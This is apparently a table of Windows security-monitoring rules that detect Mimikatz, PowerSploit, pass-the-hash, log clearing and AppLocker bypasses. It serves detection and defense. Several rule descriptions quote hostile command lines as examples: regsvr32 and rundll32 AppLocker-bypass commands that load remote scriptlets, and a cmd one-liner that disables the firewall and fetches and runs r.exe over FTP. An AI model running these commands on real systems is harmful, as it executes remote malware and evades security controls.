| DisplayName | Description | ID | Target | Category | Enabled | Instance Name | Counter Name | Frequency | Event_ID | Event Source | Alert Generate | Alert Severity | Alert Priority | Remotable | Event Log |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Security Monitoring: Collect SMBv1 Connections | Description for the new rule | Security.Monitoring.Collect.SMBv1Connections | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Collect LAPS Events | Description for the new event collection rule. | Security.Monitoring.CollectionRule.CollectLAPSEvents | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Possible Crypto-Ransomware Installed on Computer | This rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that immediately acts, it could potentially detect versions configured to activate at a later time. | Security.Monitoring.Event.4688.GenericCryptoRansomWare | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: RegSvr32 used to load a DLL that is not located on this machine | A little-known RegSvr32 attack vector is the ability to load malicious DLL files from a location that the attacker controls. This can be over the internet or on an internal compromised host, as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. | Security.Monitoring.Event.RemoteRegSvr32 | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: SeDebugPrivilege Escalation Detected | This alert is generated when a process other than WMI assigns itself debug privileges. | Security.Monitoring.Event.SeDebugPrivilegeEscalation | Microsoft.Windows.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Collect LANMAN Authentication | Collection rule to collect all authentication events using LanManager to authenticate. This is an old protocol that has known vulnerabilities and should be shut off. | Security.Monitoring.EventCollection.LanMan | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Collect NTLMV1 Events | Collection rule to collect all authentication events using NTLMv1 to authenticate. This is an old protocol that has known vulnerabilities and should be shut off. | Security.Monitoring.EventCollection.NTLMV1 | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Collect WDigest Authentication Events | If the proper audit policies are turned on, this rule will collect WDigest logons. See https://blogs.technet.microsoft.com/kfalde/2014/11/02/kb2871997-and-wdigest-part-2/ for details | Security.Monitoring.EventCollection.WdigestAuthentication | Microsoft.Windows.Server.DC.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Forwarded Events: Possible Crypto-Ransomware Installed on Computer | This rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that immediately acts, it could potentially detect versions configured to activate at a later time. | Security.Monitoring.ForwardedEvents.4688.GenericCryptoRansomWare | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Collect LAPS Events | Description for the new event collection rule. | Security.Monitoring.ForwardedEvents.CollectLAPSEvents | WindowsEventCollectorDiscovery.EventLogCollectorServer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Forwarded Events: SeDebug Privilege Escalation Detected | This alert is generated when a process other than WMI assigns itself debug privileges. | Security.Monitoring.ForwardedEvents.DebugEscalation | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit FindAV Signature Tool is in Use | Find-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can then be redesigned to avoid detection. | Security.Monitoring.ForwardedEvents.FindAVSignature | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit Get DLL Load Path is in Use | Get-DLLLoadPath is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy. | Security.Monitoring.ForwardedEvents.GetDLLLoadPath | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit HTTP Path Discovery Tool is in Use | This tool runs a dictionary of paths against a web server to determine the status of each path. | Security.Monitoring.ForwardedEvents.GetHTTPStatus | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit Key Stroke Logger in Use | This is a PowerSploit tool that can be used to log key strokes. | Security.Monitoring.ForwardedEvents.GetKeystroke | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit Invoke DLL Injection Command in Use | A PowerSploit tool used to inject code into DLL files is in use in the environment. | Security.Monitoring.ForwardedEvents.InvokeDLLInjection | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Invoke-Mimikatz Detected in Tier 0 Environment | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.InvokeMimikatz | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Invoke Ninja Copy is in Use | This tool allows an attacker to make an offline copy of protected OS Secrets (i.e. the SAM) while they are in use. | Security.Monitoring.ForwardedEvents.InvokeNinjaCopy | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Invoke Portscan is in Use | This looks for the PowerSploit tool Invoke-Portscan, which is used to scan IP addresses for open ports. | Security.Monitoring.ForwardedEvents.InvokePortScan | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring: Invoke ShellCode is in Use | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.InvokeShellCodeInUse | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Hidden Process Starting Using PowerShell | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.PowerShellStartHiddenProcess | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: RegSvr32 used to load a DLL that is not located on this machine | A little-known RegSvr32 attack vector is the ability to load malicious DLL files from a location that the attacker controls. This can be over the internet or on an internal compromised host, as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. | Security.Monitoring.ForwardedEvents.RemoteRegSvr32 | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring: PowerSploit FindAV Signature Tool is in Use | Find-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can then be redesigned to avoid detection. | Security.Monitoring.PowerShellLog.FindAVSignature | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: PowerSploit Get DLL Load Path is in Use | Get-DLLLoadPath is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy. | Security.Monitoring.PowerShellLog.GetDLLLoadPath | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: PowerSploit HTTP Path Discovery Tool is in Use | This tool runs a dictionary of paths against a web server to determine the status of each path. | Security.Monitoring.PowerShellLog.GetHTTPStatus | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: PowerSploit Key Stroke Logger in Use | This is a PowerSploit tool that can be used to log key strokes. | Security.Monitoring.PowerShellLog.GetKeystroke | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: PowerSploit Invoke DLL Injection Command in Use | A PowerSploit tool used to inject code into DLL files is in use in the environment. | Security.Monitoring.PowerShellLog.InvokeDLLInjection | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke-Mimikatz is in Use. | Description for the new alert rule. | Security.Monitoring.PowerShellLog.InvokeMimikatzInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke Ninja Copy is in Use | This tool allows an attacker to make an offline copy of protected OS Secrets (i.e. the SAM) while they are in use. | Security.Monitoring.PowerShellLog.InvokeNinjaCopy | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke Portscan is in Use | This looks for the PowerSploit tool Invoke-Portscan, which is used to scan IP addresses for open ports. | Security.Monitoring.PowerShellLog.InvokePortScan | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke ShellCode in Use | Description for the new alert rule. | Security.Monitoring.PowerShellLog.InvokeShellCodeInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Hidden Process Starting Using PowerShell | Description for the new alert rule. | Security.Monitoring.PowerShellLog.PowerShellStartHiddenProcess | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Modification has been made to the DC OU | | Security.Monitoring.SecurityMonitoring.Event.DCOUModify | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: A GPO was Created | A new GPO has been created. | Security.Monitoring.SecurityMonitoring.Event.GPOCreation | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security Monitoring: A GPO was Deleted | This rule detects the deletion of a GPO | Security.Monitoring.SecurityMonitoring.Event.GPODeletionRule | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security Monitoring: Failed RDP Logon | | SecurityMonitoring.Event.FailedLogin | Microsoft.Windows.Server.OperatingSystem | Custom | False | | | 0 | 0 | | True | Warning | Normal | True | |
| Collect Failed Login Attempts | Failed Login Attempts | SecurityMonitoring.Failed.Login.Attempts.Collection | Microsoft.Windows.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Domain Admins membership has changed | | SecurityMonitoringMP.Accounts.DomainAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Enterprise Admins membership has changed | | SecurityMonitoringMP.Accounts.EnterpriseAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Local Administrators Group was Modified | | SecurityMonitoringMP.Accounts.LocalAdminChange | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Schema Admins membership has changed | | SecurityMonitoringMP.Accounts.SchemaAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Mimikatz in use | Mimikatz is a credential theft tool used for pass the hash attacks. This should not be present in your environment. | SecurityMonitoringMP.APPLocker.Mimikatz | Microsoft.Windows.Computer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: Prohibited App in Use | | SecurityMonitoringMP.APPLocker.ProhibitedApp | Microsoft.Windows.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: PSEXEC in Use | | SecurityMonitoringMP.APPLocker.PSExec | Microsoft.Windows.Computer | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: WCE in Use | WCE is a credential theft tool used to perform pass-the-hash attacks and to enumerate WDigest passwords if that is turned on in your environment. Other than penetration testing, there is little reason for this tool to exist in your environment. This should be investigated immediately. | SecurityMonitoringMP.APPLocker.WCE | Microsoft.Windows.Computer | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: WinRar in use | | SecurityMonitoringMP.APPLocker.WinRar | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: A suspicious process creation (AppLocker bypass) was executed | To bypass restrictive AppLocker policies, attackers will implement a specially crafted command line which makes use of the Windows native executable "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by AppLocker). Rundll32.exe can be used to call JavaScript to execute arbitrary commands which are not blocked by restrictive AppLocker policies. The rundll32.exe syntax is as follows:<br>`rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code>`<br>Events of this nature need to be investigated. | SecurityMonitoringMP.Event.4688.SuspiciousApplockerJava | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (AppLocker bypass using regsvr32) was executed | AppLocker bypass techniques using Regsvr32.exe (greg)<br>Note: The following is already contained in SCUBA_RULE_Applocker_Bypass<br>Examples:<br>`regsvr32 /s /n /u /i:file.sct scrobj.dll`<br>`regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll`<br>`regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll` | SecurityMonitoringMP.Event.4688.SuspiciousApplockerRegsvr | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (cmd) was executed | These events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately. | SecurityMonitoringMP.Event.4688.SuspiciousCMD | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (FTP script execution via echo command) was executed | Detection of FTP scripts created via the echo command:<br>Based on several cases where a compromised SQL service was used and SQL Agent jobs were created to invoke 'xp_cmdshell', which in turn created and launched FTP scripts to download and run malware…<br>Example of the command line used to create and run FTP scripts:<br>`"Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\""`<br>This type of event is rare and should be investigated. | SecurityMonitoringMP.Event.4688.SuspiciousFTPCommand | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (registry) was executed | This rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear. | SecurityMonitoringMP.Event.4688.SuspiciousReg | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (malicious use of WindowPosition with PowerShell) was executed | See: https://technet.microsoft.com/en-us/library/cc957410.aspx<br>The WindowPosition value specifies the position of the command window on the user's screen.<br>The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis.<br>When the WindowPosition value is set to 201329664 (Hex: 0x0c00 0c00), this places the console in a non-visible section of the user's screen (where X axis = 0c00 and Y axis = 0c00), an area that is hidden from view below the visible start menu/taskbar.<br>Other console apps that can be modified to make the screen non-visible | SecurityMonitoringMP.Event.4688.SuspiciousWindowsPosition | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: Possible Golden Ticket in Use | | SecurityMonitoringMP.Event.GoldenTicketDetection | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 4769 | | True | Error | Normal | True | Security |
| Security Monitoring: Local account created on a member server | In a normal environment, this will only happen when the system is set up. You should not see this event on production member servers at all. | SecurityMonitoringMP.Event.LocalAccountCreatedonServer | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Scheduled Task was Created | | SecurityMonitoringMP.Event.ScheduledTaskCreation | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 106 | | True | Error | Normal | True | Microsoft-Windows-TaskScheduler/Operational |
| Security Monitoring: Security Log was cleared | Clearing the security log is something an attacker will do to cover their tracks. By default, logs cycle. If the log has been cleared, this should be investigated. | SecurityMonitoringMP.Event.SecurityLogCleared | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 1102 | Microsoft-Windows-Eventlog | True | Error | Normal | True | Security |
| Security Monitoring: A Service was created on a domain controller | Monitors domain controller system logs for event ID 7045 (service created). In a steady state, this should never happen. | SecurityMonitoringMP.Event.ServiceCreatedonDC | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 7045 | | True | Error | Normal | True | System |
| Security Monitoring: A service was created on a member server | I would consider enabling this rule for any production server that is in a steady state. No services should be created at this point, and any event where one is created would be worthy of investigation. | SecurityMonitoringMP.Event.ServiceCreatedonMemberServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | System |
| Security Monitoring: Service associated with a known threat was created on a member server | This is a special case of event ID 7045 targeting the names of services that are created by known tools such as Windows Credential Editor, PsExec, etc. If you turned on the generic 7045 rule, this alert should be disabled as it will generate duplicate events. | SecurityMonitoringMP.Event.ServiceKnownThreat | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 7045 | | True | Error | Normal | True | System |
| Security Monitoring: A Smart Card has been Disabled to Allow for Interactive Logon | Someone has purposely deselected the option to disable smart card authentication for the account. Verify that this has in fact been approved. | SecurityMonitoringMP.Event.SmartCardDisabled | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 4738 | | True | Error | Normal | True | Security |
| Security Monitoring: Software was Installed on a Server | This rule looks for 11707 events in the application log and alerts accordingly. Note that patches will likely be flagged by this rule, so it should only be turned on if there is a good maintenance process in place. | SecurityMonitoringMP.Event.SoftwareInstallOnServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 11707 | MsiInstaller | True | Warning | Normal | True | Application |
| Security Monitoring: Software was Removed from a Server | This may not be a security event and is disabled by default. This could be enabled and edited to target security software in customer environments. | SecurityMonitoringMP.Event.SoftwareRemovedFromServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 11724 | MsiInstaller | True | Warning | Normal | True | Application |
| Security Monitoring: The system Log was cleared | | SecurityMonitoringMP.Event.SystemLogCleared | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 104 | Microsoft-Windows-Eventlog | True | Error | Normal | True | System |
| Security Monitoring: A system has been powered off | This is not necessarily a security event, and as such it can generate noise and is off by default. | SecurityMonitoringMP.Event.SystemPoweredOff | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 1074 | User32 | True | Warning | Normal | True | System |
| Security Monitoring: A system was restarted | This is not necessarily a security event, and as such this is disabled by default, but it can be useful in tracking security events or bad business practice. | SecurityMonitoringMP.Event.SystemRestarted | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 1074 | User32 | True | Warning | Normal | True | System |
| Security Monitoring: Unexpected System Shutdown | This checks the system log for unexpected shutdown events and generates an alert. While not necessarily related to an attack, these events are potentially worth investigating for health reasons in the environment. | SecurityMonitoringMP.Event.UnexpectedShutdown | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 0 | | True | Warning | Normal | True | System |
| Security Monitoring Collection: Event ID 4672 | | SecurityMonitoringMP.EventCollection.4672 | Microsoft.Windows.Server.OperatingSystem | EventCollection | False | | | 0 | 0 | | False | | | True | |
| Security Monitoring Collection: Event ID 4624 Logon Type 4 | | SecurityMonitoringMP.EventCollection.BatchLogon | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Event Collection: Event ID 4769 result 0x1F | | SecurityMonitoringMP.EventCollection.GoldenTicket | Microsoft.Windows.Server.DC.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Collection: Event ID 4694 | | SecurityMonitoringMP.EventCollection.SpecialGroupLogon | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass) was executed | To bypass restrictive AppLocker policies, attackers will implement a specially crafted command line which makes use of the Windows native executable "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by AppLocker). Rundll32.exe can be used to call JavaScript to execute arbitrary commands which are not blocked by restrictive AppLocker policies. The rundll32.exe syntax is as follows:<br>`rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code>`<br>Events of this nature need to be investigated. | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerJava | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass using regsvr32) was executed | AppLocker bypass techniques using Regsvr32.exe (greg)<br>Note: The following is already contained in SCUBA_RULE_Applocker_Bypass<br>Examples:<br>`regsvr32 /s /n /u /i:file.sct scrobj.dll`<br>`regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll`<br>`regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll` | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvr | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (cmd) was executed | These events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately. | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousCMD | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (FTP script execution via echo command) was executed | Detection of FTP scripts created via the echo command:<br>Based on several cases where a compromised SQL service was used and SQL Agent jobs were created to invoke 'xp_cmdshell', which in turn created and launched FTP scripts to download and run malware…<br>Example of the command line used to create and run FTP scripts:<br>`"Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\""`<br>This type of event is rare and should be investigated. | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousFTPCommand | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (registry) was executed | This rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear. | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousReg | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (malicious use of WindowPosition with PowerShell) was executed | See: https://technet.microsoft.com/en-us/library/cc957410.aspx<br>The WindowPosition value specifies the position of the command window on the user's screen.<br>The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis.<br>When the WindowPosition value is set to 201329664 (Hex: 0x0c00 0c00), this places the console in a non-visible section of the user's screen (where X axis = 0c00 and Y axis = 0c00), an area that is hidden from view below the visible start menu/taskbar.<br>Other console apps that can be modified to make the screen non-visible | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousWindowsPosition | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Potential Credential Swap in Progress | | SecurityMonitoringMP.ForwardedEvents.CredentialSwap | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Local User Created or Deleted in Administrator Security Group | | SecurityMonitoringMP.ForwardedEvents.LocalUserCreatedDeleted | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Prohibited App in Use | | SecurityMonitoringMP.ForwardedEvents.ProhibitedApp | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 8003 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Possible PtH Attack in Progress Against Tier 2 | | SecurityMonitoringMP.ForwardedEvents.PtHTier2 | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Security log cleared on a server configured to forward events | | SecurityMonitoringMP.ForwardedEvents.SecurityLogCleared | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 1102 | Microsoft-Windows-Eventlog | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Service Created on system | | SecurityMonitoringMP.ForwardedEvents.ServiceCreation | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Service associated with a known threat was created on a forwarding computer | | SecurityMonitoringMP.ForwardedEvents.ServiceCreationKnownThreats | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 7045 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Special Group logon event | | SecurityMonitoringMP.ForwardedEvents.SpecialGroupLogon | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: System Log was Cleared | | SecurityMonitoringMP.ForwardedEvents.SystemLogCleared | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 104 | Microsoft-Windows-Eventlog | True | Error | Normal | True | ForwardedEvents |
| GPO Change Event then run correlation script Rule | | SecurityMonitoringMP.GPOMonitoring.EventAndScript.Rule | Microsoft.Windows.Server.DC.Computer | Custom | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security Monitoring: Potential Credential Swap in Progress | | SecurityMonitoringMP.Pth.CredentialSwap | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Possible PtH attack in progress (successful) against DC | | SecurityMonitoringMP.Pth.PtHAgainstDC | Microsoft.Windows.Server.DC.Computer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Possible PtH Attack in Progress against tier 1 | | SecurityMonitoringMP.Pth.PtHAgainstTier1 | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring Threat Hunting: Batch Logon in use | This rule checks the security log for event ID 4624 Logon Type 4. Logon type 4 is a batch logon, which essentially means that there are exposed credentials on this system. Investigation should determine which application is using said credentials. Once the applications are remediated, batch logons can be disabled, making your environment more secure. | SecurityMonitoringMP.ThreatHunt.BatchLogonInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring Threat Hunting: Special Group logon event | This rule will not generate any noise in a normal environment. It requires special groups auditing to be turned on via GPO, as well as the specific memberships to be targeted in the registry. If you've done these tasks, this monitor will alert every time a user that is a member of these | SecurityMonitoringMP.ThreatHunt.SpecialGroupLogon | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |